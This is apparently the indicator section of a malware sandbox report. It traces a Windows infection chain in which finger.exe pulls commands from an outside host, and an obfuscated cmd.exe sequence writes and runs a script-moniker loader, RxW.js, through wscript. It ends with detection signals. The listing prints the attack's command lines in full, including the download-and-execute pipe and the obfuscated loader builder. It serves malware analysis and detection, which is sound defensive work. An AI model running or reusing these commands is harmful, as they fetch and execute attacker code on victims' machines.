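Technical Information
Note on reading this listing: the '#' characters in the host names are masking applied by the report, not part of the names. The unmasked names 5sxktawaa3.estilotransportes.xyz and 6haiew.xkqwditozis.xyz appear in the command lines below. The sub-headings that grouped these entries (processes, files, connections, DNS) appear to have been lost, which is probably why some hosts are listed twice. microsoft.com and cl###flare.com (apparently a masked cloudflare.com) are widely used legitimate services, so treat them as context rather than as indicators to block.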
- '<SYSTEM32>\finger.exe' ok@5sxktawaa3.estilotransportes.xyz
- '<SYSTEM32>\more.com' +2
- '<SYSTEM32>\wscript.exe' "C:\Users\Public\RxW.js"
- C:\users\public\rxw.js
- '5s########.estilotransportes.xyz':79
- '6h####.xkqwditozis.xyz':80
- 'cl###flare.com':443
- 'microsoft.com':80
- '5s########.estilotransportes.xyz':79
- 'cl###flare.com':443
- DNS ASK 5s########.estilotransportes.xyz
- DNS ASK 6h####.xkqwditozis.xyz
- DNS ASK cl###flare.com
- DNS ASK microsoft.com
- '<SYSTEM32>\cmd.exe' /c finger.exe ok@5sxktawaa3.estilotransportes.xyz |more +2 |cmd
- '<SYSTEM32>\cmd.exe'
- '<SYSTEM32>\cmd.exe' /V/D/c "Set RUYD=.j&&sET MMWUA=veDl4areDl4 a =eDl4 'sceDl4rieDl4pteDl4:'; b =eDl4 'heDl4TtPeDl4:'; GeDl4eteDl4ObjeDl4eceDl4t(eDl4a+b+'&&sET Y0R5=XPWRPXPWRP6haiew.xkqwditozis.xyzXPWRP?1XPWRP')&&...
- '<SYSTEM32>\cmd.exe' /S /D /c" sEt/p IY5UR="%MMWUA:eDl4=%%Y0R5:XPWRP=/%" 0<nul 1>C:\Users\Public\RxW%RUYD%s"
- '<SYSTEM32>\cmd.exe' /S /D /c" start cmd /c start C:\Users\Public\RxW%RUYD%s "
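- '<SYSTEM32>\cmd.exe' /c start C:\Users\Public\RxW.js
Summary of the chain shown above: finger.exe is used as a download channel over TCP port 79 and its output is piped through more.com into cmd. cmd variable substitution then strips the junk tokens eDl4 and XPWRP at run time to write C:\Users\Public\RxW.js, which wscript.exe runs. For detection, the behavioural signals are finger.exe making outbound connections, cmd.exe output piped into another cmd instance, cmd.exe started with /V and chained Set assignments, and wscript.exe executing a script from C:\Users\Public. These are more durable than the host names, which may change between samples.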